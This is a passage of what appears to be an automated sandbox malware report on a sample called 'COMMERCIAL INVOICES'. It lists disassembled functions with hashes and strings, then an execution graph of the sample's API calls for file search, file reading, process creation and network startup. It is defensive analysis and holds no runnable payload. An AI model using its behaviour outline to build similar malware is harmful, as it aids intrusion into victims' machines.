                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2551E6B6A30117BFCF11EB9D888097EFBB8BB492407108269E565D7681D374DE50C7A0
                                                                                                                                                                                                                                      Function 012F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                      • Opcode ID: d5ceafb2a0cdc1a61aff75b373844482a1c01e59d2fa3402bcbddecfe298c7c4
                                                                                                                                                                                                                                      • Instruction ID: 28f54187c5e139f37c3dc30ef9e51b1358aefb0b0bd0b12cb675491945295e69
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5ceafb2a0cdc1a61aff75b373844482a1c01e59d2fa3402bcbddecfe298c7c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA5115B5A20646EFDB34DF9CD89087FFBF8EB45200F04846DE696D7641E6B4DA008B60
                                                                                                                                                                                                                                      Function 01277630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • ExecuteOptions, xrefs: 012B46A0
                                                                                                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 012B4787
                                                                                                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 012B4742
                                                                                                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 012B4725
                                                                                                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 012B4655
                                                                                                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 012B46FC
                                                                                                                                                                                                                                      • Execute=1, xrefs: 012B4713
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                                                                                                      • Opcode ID: bbe0a396819c7ccacb255f84a4a553d008e17385036acded75dfbdd0a93abd42
                                                                                                                                                                                                                                      • Instruction ID: 0ae3b150c90eb51c82e4134abd4a57805d12fb1f1859104732a86fc60590f387
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbe0a396819c7ccacb255f84a4a553d008e17385036acded75dfbdd0a93abd42
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C051293162021ABEEF15AAA8DC8AFFF77A9AF14704F0400A9D605A7191E771AA41CF51
                                                                                                                                                                                                                                      Function 01316940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                                                                                                                      • Instruction ID: 14d4a161ba0c519e36bc5703057dc7135a6c108e8af2ed16f1fd1b22861b6428
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA0217B1508341AFD309DF58C590A6BBBE5FFC8708F04892DF98987258DB71E905CB52
                                                                                                                                                                                                                                      Function 0128B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                                                                                                                      • String ID: +$-$0$0
                                                                                                                                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                                                                                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                      • Instruction ID: 4d2daacbc32a3aa6b8f52d3a0d1e0171f50d34e643ab8d24c78bef3ac946214c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B081C231E3725A9EEF29BE6CC8517BE7BA1AF45310F1C421DDA61A72D1C63498408B51
                                                                                                                                                                                                                                      Function 012F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                                                                                                                                                      • API String ID: 48624451-2819853543
                                                                                                                                                                                                                                      • Opcode ID: bc3b1325c2bd85aa5f7a48ff4adca24a67e7ccbf872d3768f236d2f648a8a45a
                                                                                                                                                                                                                                      • Instruction ID: 16d5c266c57e9d6735cc29dde8844c62971f2a86f924526a4a12fc6935cb1a4e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc3b1325c2bd85aa5f7a48ff4adca24a67e7ccbf872d3768f236d2f648a8a45a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A215676A2011A9BDB11DE69CC50AFFBBECAF55654F440129EB05E3241E730D9018BA5
                                                                                                                                                                                                                                      Function 0126F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012B02E7
                                                                                                                                                                                                                                      • RTL: Re-Waiting, xrefs: 012B031E
                                                                                                                                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012B02BD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                      • API String ID: 0-2474120054
                                                                                                                                                                                                                                      • Opcode ID: ff242eab366eef86d63e06c2f4e5f014ee8adbc23560ee16d6fe736b68389008
                                                                                                                                                                                                                                      • Instruction ID: 85ecced33ce76a4389fc6cde5bdd756fdf8031e3cbda99ba1ac1e1e653b2900e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff242eab366eef86d63e06c2f4e5f014ee8adbc23560ee16d6fe736b68389008
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60E100306243429FEB26CF28D995B6ABBE4BF84354F140A5DF6A18B2D1D774D884CB42
                                                                                                                                                                                                                                      Function 0127BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 012B7B7F
                                                                                                                                                                                                                                      • RTL: Re-Waiting, xrefs: 012B7BAC
                                                                                                                                                                                                                                      • RTL: Resource at %p, xrefs: 012B7B8E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                      • API String ID: 0-871070163
                                                                                                                                                                                                                                      • Opcode ID: 6f062211691b012f063d0f154cd1c4351eceb72a85c445dc3d7136b961bb971b
                                                                                                                                                                                                                                      • Instruction ID: 0a8fe8d14c7c653dd7214c13b546fd6bdd27df1cc81d6c9f98058fa93f69cf19
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f062211691b012f063d0f154cd1c4351eceb72a85c445dc3d7136b961bb971b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C41E2313257039FD720DE29C841B6BB7E5EF99B10F000A1DFA56DB680DB72E5058B92
                                                                                                                                                                                                                                      Function 0127B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012B728C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 012B7294
                                                                                                                                                                                                                                      • RTL: Re-Waiting, xrefs: 012B72C1
                                                                                                                                                                                                                                      • RTL: Resource at %p, xrefs: 012B72A3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                                                                                                                                      • Opcode ID: e1df56df71396823049bf126fa9fae5187b036aea17b3a70a3dc822168bf8c6a
                                                                                                                                                                                                                                      • Instruction ID: 33f26474fa9ab5d20d724fe7965e9e10a04731bed7bdbd16f305bf3329ed9233
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1df56df71396823049bf126fa9fae5187b036aea17b3a70a3dc822168bf8c6a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B411F35620203ABC720DE29CC81BAAB7A1FB94750F140619FA55AB280DB31E802CBD1
                                                                                                                                                                                                                                      Function 012F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                                                                                                                                      • Opcode ID: e106821b9bf6ee0ca690050a47b92818e96c187c38de609d63d87e412d0d3729
                                                                                                                                                                                                                                      • Instruction ID: b31babf0ad179e5f7d9f3251f764e3d85980862d545d8d0d5862d3e5098fc89e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e106821b9bf6ee0ca690050a47b92818e96c187c38de609d63d87e412d0d3729
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D331577261051ADFDB20DF2DDC40BFEB7B8EB55610F444569EA49E3240EB30DA448B60
                                                                                                                                                                                                                                      Function 01287D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                                                                                                                      • String ID: +$-
                                                                                                                                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                                                                                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                                                                                      • Instruction ID: 8695abd97427582f03ba9f4b9743a3d240ecf9fd1db130f6afc6f0c7b12149fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B391D471E2220B9BEB24FF6EC8816BEBBA5BF54320F74451AEA55E72C0D7309941C711
                                                                                                                                                                                                                                      Function 01249126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: $$@
                                                                                                                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                                                                                                                      • Opcode ID: 02ef6bd9acd747190dc7cccab178e086c6471ef6054d210ade15af69ca7285f2
                                                                                                                                                                                                                                      • Instruction ID: 28a86925fdec5cd463d13f3935ab961e06fa886592e21daadd785efff9a82aba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02ef6bd9acd747190dc7cccab178e086c6471ef6054d210ade15af69ca7285f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0811B71D1126ADBDB35CB54CC45BEEB7B8AB08754F0041EAEA19B7280D7709E84CFA4

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:2.3%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:1.7%
                                                                                                                                                                                                                                      Total number of Nodes:410
                                                                                                                                                                                                                                      Total number of Limit Nodes:68
                                                                                                                                                                                                                                      execution_graph 97401 862f03 97406 867b70 97401->97406 97404 862f2f 97407 867b8a 97406->97407 97411 862f13 97406->97411 97415 8788d0 97407->97415 97410 879210 NtClose 97410->97411 97411->97404 97412 879210 97411->97412 97413 87922a 97412->97413 97414 87923b NtClose 97413->97414 97414->97404 97416 8788ea 97415->97416 97419 4be35c0 LdrInitializeThunk 97416->97419 97417 867c5a 97417->97410 97419->97417 97420 86ab40 97425 86a850 97420->97425 97422 86ab4d 97437 86a4d0 97422->97437 97424 86ab69 97427 86a875 97425->97427 97426 86a9c3 97426->97422 97427->97426 97447 8731c0 97427->97447 97429 86a9da 97429->97422 97430 86a9d1 97430->97429 97432 86aac7 97430->97432 97462 869f20 97430->97462 97434 86ab2a 97432->97434 97471 86a290 97432->97471 97475 87b300 97434->97475 97438 86a4e6 97437->97438 97444 86a4f1 97437->97444 97439 87b3e0 RtlAllocateHeap 97438->97439 97439->97444 97440 86a512 97440->97424 97441 86a822 97442 86a83b 97441->97442 97443 87b300 RtlFreeHeap 97441->97443 97442->97424 97443->97442 97444->97440 97444->97441 97445 869f20 RtlFreeHeap 97444->97445 97446 86a290 RtlFreeHeap 97444->97446 97445->97444 97446->97444 97448 8731ce 97447->97448 97449 8731d5 97447->97449 97448->97430 97478 864350 97449->97478 97452 873219 97458 8733c7 97452->97458 97483 87b3e0 97452->97483 97455 873232 97456 8733bd 97455->97456 97455->97458 97460 87324e 97455->97460 97457 87b300 RtlFreeHeap 97456->97457 97456->97458 97457->97458 97458->97430 97459 87b300 RtlFreeHeap 97461 8733b1 97459->97461 97460->97458 97460->97459 97461->97430 97463 869f46 97462->97463 97489 86d940 97463->97489 97465 869fb8 97467 86a140 97465->97467 97468 869fd6 97465->97468 97466 86a125 97466->97430 97467->97466 97469 869de0 RtlFreeHeap 97467->97469 97468->97466 97494 869de0 97468->97494 97469->97467 97472 86a2b6 97471->97472 97473 86d940 RtlFreeHeap 97472->97473 97474 86a33d 97473->97474 97474->97432 97502 879590 97475->97502 97477 86ab31 97477->97422 97479 864374 97478->97479 97480 86437b 97479->97480 97481 8643b0 LdrLoadDll 97479->97481 97480->97452 97482 872c80 LdrLoadDll 97480->97482 97481->97480 97482->97452 97486 879540 97483->97486 97485 87b3fb 97485->97455 97487 87955a 97486->97487 97488 87956b RtlAllocateHeap 97487->97488 97488->97485 97491 86d964 97489->97491 97490 86d971 97490->97465 97491->97490 97492 87b300 RtlFreeHeap 97491->97492 97493 86d9b4 97492->97493 97493->97465 97495 869dfd 97494->97495 97498 86d9d0 97495->97498 97497 869f03 97497->97468 97499 86d9f4 97498->97499 97500 86da9e 97499->97500 97501 87b300 RtlFreeHeap 97499->97501 97500->97497 97501->97500 97503 8795ad 97502->97503 97504 8795be RtlFreeHeap 97503->97504 97504->97477 97505 879080 97506 879127 97505->97506 97508 8790ab 97505->97508 97507 87913d NtReadFile 97506->97507 97514 860c0b PostThreadMessageW 97515 860c1d 97514->97515 97516 866c0b 97517 866ba1 97516->97517 97520 866c0e 97516->97520 97521 867d20 97517->97521 97519 866be4 97522 867d3d 97521->97522 97528 878920 97522->97528 97524 867d8d 97525 867d94 97524->97525 97533 878a00 97524->97533 97525->97519 97527 867dbd 97527->97519 97529 8789b8 97528->97529 97530 878948 97528->97530 97538 4be2f30 LdrInitializeThunk 97529->97538 97530->97524 97531 8789f1 97531->97524 97534 878aae 97533->97534 97535 878a2c 97533->97535 97539 4be2d10 LdrInitializeThunk 97534->97539 97535->97527 97536 878af3 97536->97527 97538->97531 97539->97536 97540 86718b 97542 867125 97540->97542 97541 867182 97542->97540 97542->97541 97544 86b070 97542->97544 97545 86b096 97544->97545 97546 86b2c9 97545->97546 97571 879620 97545->97571 97546->97541 97548 86b10c 97548->97546 97574 87c5f0 97548->97574 97550 86b12b 97550->97546 97551 86b202 97550->97551 97580 878830 97550->97580 97553 86b221 97551->97553 97555 865930 LdrInitializeThunk 97551->97555 97558 86b2b1 97553->97558 97592 8783a0 97553->97592 97555->97553 97556 86b196 97556->97546 97557 86b1ea 97556->97557 97559 86b1c8 97556->97559 97584 865930 97556->97584 97588 867ef0 97557->97588 97563 867ef0 LdrInitializeThunk 97558->97563 97607 8745f0 LdrInitializeThunk 97559->97607 97567 86b2bf 97563->97567 97566 86b288 97597 878450 97566->97597 97567->97541 97569 86b2a2 97602 8785b0 97569->97602 97572 87963d 97571->97572 97573 87964e CreateProcessInternalW 97572->97573 97573->97548 97575 87c560 97574->97575 97576 87c5bd 97575->97576 97577 87b3e0 RtlAllocateHeap 97575->97577 97576->97550 97578 87c59a 97577->97578 97579 87b300 RtlFreeHeap 97578->97579 97579->97576 97581 87884a 97580->97581 97608 4be2c0a 97581->97608 97582 86b18d 97582->97551 97582->97556 97585 86593c 97584->97585 97586 878a00 LdrInitializeThunk 97585->97586 97587 86596e 97586->97587 97587->97559 97589 867f03 97588->97589 97611 878730 97589->97611 97591 867f2e 97591->97541 97593 87841d 97592->97593 97595 8783cb 97592->97595 97617 4be39b0 LdrInitializeThunk 97593->97617 97594 878442 97594->97566 97595->97566 97598 8784ca 97597->97598 97600 878478 97597->97600 97618 4be4340 LdrInitializeThunk 97598->97618 97599 8784ef 97599->97569 97600->97569 97603 878630 97602->97603 97604 8785df 97602->97604 97619 4be2fb0 LdrInitializeThunk 97603->97619 97604->97558 97605 878655 97605->97558 97607->97557 97609 4be2c1f LdrInitializeThunk 97608->97609 97610 4be2c11 97608->97610 97609->97582 97610->97582 97612 8787ae 97611->97612 97614 87875b 97611->97614 97616 4be2dd0 LdrInitializeThunk 97612->97616 97613 8787d3 97613->97591 97614->97591 97616->97613 97617->97594 97618->97599 97619->97605 97620 868614 97621 868624 97620->97621 97623 8685d4 97621->97623 97624 866eb0 97621->97624 97625 866ec6 97624->97625 97627 866eff 97624->97627 97625->97627 97628 866d20 LdrLoadDll 97625->97628 97627->97623 97628->97627 97629 859b90 97630 859b9f 97629->97630 97631 859be0 97630->97631 97632 859bcd CreateThread 97630->97632 97633 862090 97634 878830 LdrInitializeThunk 97633->97634 97635 8620c6 97634->97635 97636 871590 97637 8715ac 97636->97637 97638 8715d4 97637->97638 97639 8715e8 97637->97639 97640 879210 NtClose 97638->97640 97641 879210 NtClose 97639->97641 97642 8715dd 97640->97642 97643 8715f1 97641->97643 97646 87b420 RtlAllocateHeap 97643->97646 97645 8715fc 97646->97645 97647 878f10 97648 878fc7 97647->97648 97650 878f3f 97647->97650 97649 878fdd NtCreateFile 97648->97649 97653 86c3e0 97655 86c409 97653->97655 97654 86c50d 97655->97654 97656 86c4b3 FindFirstFileW 97655->97656 97656->97654 97658 86c4ce 97656->97658 97657 86c4f4 FindNextFileW 97657->97658 97659 86c506 FindClose 97657->97659 97658->97657 97659->97654 97660 875ee0 97661 875f3a 97660->97661 97663 875f47 97661->97663 97664 8738f0 97661->97664 97665 87390f 97664->97665 97666 864350 LdrLoadDll 97665->97666 97668 873a3e 97665->97668 97669 873977 97665->97669 97666->97669 97667 8739c0 Sleep 97667->97669 97668->97663 97669->97667 97669->97668 97671 875e40 LdrLoadDll Sleep 97669->97671 97671->97669 97677 878660 97678 8786ec 97677->97678 97680 878688 97677->97680 97682 4be2ee0 LdrInitializeThunk 97678->97682 97679 87871d 97682->97679 97683 8787e0 97684 8787fa 97683->97684 97687 4be2df0 LdrInitializeThunk 97684->97687 97685 878822 97687->97685 97688 871920 97693 871939 97688->97693 97689 8719c6 97690 871981 97691 87b300 RtlFreeHeap 97690->97691 97692 871991 97691->97692 97693->97689 97693->97690 97694 8719c1 97693->97694 97695 87b300 RtlFreeHeap 97694->97695 97695->97689 97696 869a2c 97697 869a31 97696->97697 97698 869a5d 97697->97698 97699 87b300 RtlFreeHeap 97697->97699 97699->97698 97700 4be2ad0 LdrInitializeThunk 97701 862568 97702 86257c 97701->97702 97705 8660c0 97702->97705 97704 862593 97706 8660f3 97705->97706 97707 866117 97706->97707 97712 878d70 97706->97712 97707->97704 97709 86613a 97709->97707 97710 879210 NtClose 97709->97710 97711 8661ba 97710->97711 97711->97704 97713 878d8d 97712->97713 97716 4be2ca0 LdrInitializeThunk 97713->97716 97714 878db9 97714->97709 97716->97714 97717 859bf0 97718 859f18 97717->97718 97719 85a42a 97718->97719 97721 87af60 97718->97721 97722 87af86 97721->97722 97727 854120 97722->97727 97724 87af92 97725 87afcb 97724->97725 97730 875470 97724->97730 97725->97719 97734 863010 97727->97734 97729 85412d 97729->97724 97731 8754d1 97730->97731 97732 8754de 97731->97732 97745 8617c0 97731->97745 97732->97725 97735 86302d 97734->97735 97737 863046 97735->97737 97738 879c90 97735->97738 97737->97729 97739 879caa 97738->97739 97740 879cd9 97739->97740 97741 878830 LdrInitializeThunk 97739->97741 97740->97737 97742 879d39 97741->97742 97743 87b300 RtlFreeHeap 97742->97743 97744 879d52 97743->97744 97744->97737 97746 8617fb 97745->97746 97763 867c80 97746->97763 97748 861803 97749 861ae6 97748->97749 97750 87b3e0 RtlAllocateHeap 97748->97750 97749->97732 97751 861819 97750->97751 97752 87b3e0 RtlAllocateHeap 97751->97752 97753 86182a 97752->97753 97754 87b3e0 RtlAllocateHeap 97753->97754 97755 86183b 97754->97755 97762 8618d2 97755->97762 97778 866820 NtClose LdrInitializeThunk LdrInitializeThunk 97755->97778 97757 864350 LdrLoadDll 97758 861a92 97757->97758 97759 861ac1 WSAStartup 97758->97759 97760 861acf 97758->97760 97759->97760 97774 877db0 97760->97774 97762->97757 97764 867cac 97763->97764 97765 867b70 2 API calls 97764->97765 97766 867ccf 97765->97766 97767 867cf1 97766->97767 97768 867cd9 97766->97768 97770 867d0d 97767->97770 97772 879210 NtClose 97767->97772 97769 867ce4 97768->97769 97771 879210 NtClose 97768->97771 97769->97748 97770->97748 97771->97769 97773 867d03 97772->97773 97773->97748 97775 877e12 97774->97775 97777 877e1f 97775->97777 97779 861b00 97775->97779 97777->97749 97778->97762 97793 867f50 97779->97793 97781 862073 97781->97777 97783 861d3b 97785 87c5f0 2 API calls 97783->97785 97784 861b20 97784->97781 97797 87c4c0 97784->97797 97787 861d50 97785->97787 97786 867ef0 LdrInitializeThunk 97789 861d9a 97786->97789 97787->97789 97802 860630 97787->97802 97789->97781 97789->97786 97791 860630 LdrInitializeThunk 97789->97791 97790 867ef0 LdrInitializeThunk 97792 861ee8 97790->97792 97791->97789 97792->97789 97792->97790 97794 867f5d 97793->97794 97795 867f85 97794->97795 97796 867f7e SetErrorMode 97794->97796 97795->97784 97796->97795 97798 87c4d6 97797->97798 97799 87c4d0 97797->97799 97800 87b3e0 RtlAllocateHeap 97798->97800 97799->97783 97801 87c4fc 97800->97801 97801->97783 97804 86063b 97802->97804 97804->97792 97805 8606a5 97804->97805 97806 8794a0 97804->97806 97805->97792 97807 8794ba 97806->97807 97810 4be2c70 LdrInitializeThunk 97807->97810 97808 8794e2 97808->97804 97810->97808 97811 86f630 97812 86f694 97811->97812 97813 8660c0 2 API calls 97812->97813 97815 86f7c7 97813->97815 97814 86f7ce 97815->97814 97838 8661d0 97815->97838 97818 86f973 97820 86f86e 97821 86f982 97820->97821 97847 86f410 97820->97847 97822 879210 NtClose 97821->97822 97824 86f98c 97822->97824 97825 86f886 97825->97821 97826 86f891 97825->97826 97827 87b3e0 RtlAllocateHeap 97826->97827 97828 86f8ba 97827->97828 97829 86f8c3 97828->97829 97830 86f8d9 97828->97830 97831 879210 NtClose 97829->97831 97856 86f300 CoInitialize 97830->97856 97833 86f8cd 97831->97833 97834 879210 NtClose 97835 86f96c 97834->97835 97837 87b300 RtlFreeHeap 97835->97837 97836 86f8e7 97836->97834 97837->97818 97839 8661f5 97838->97839 97859 878b50 97839->97859 97842 876d10 97843 876d75 97842->97843 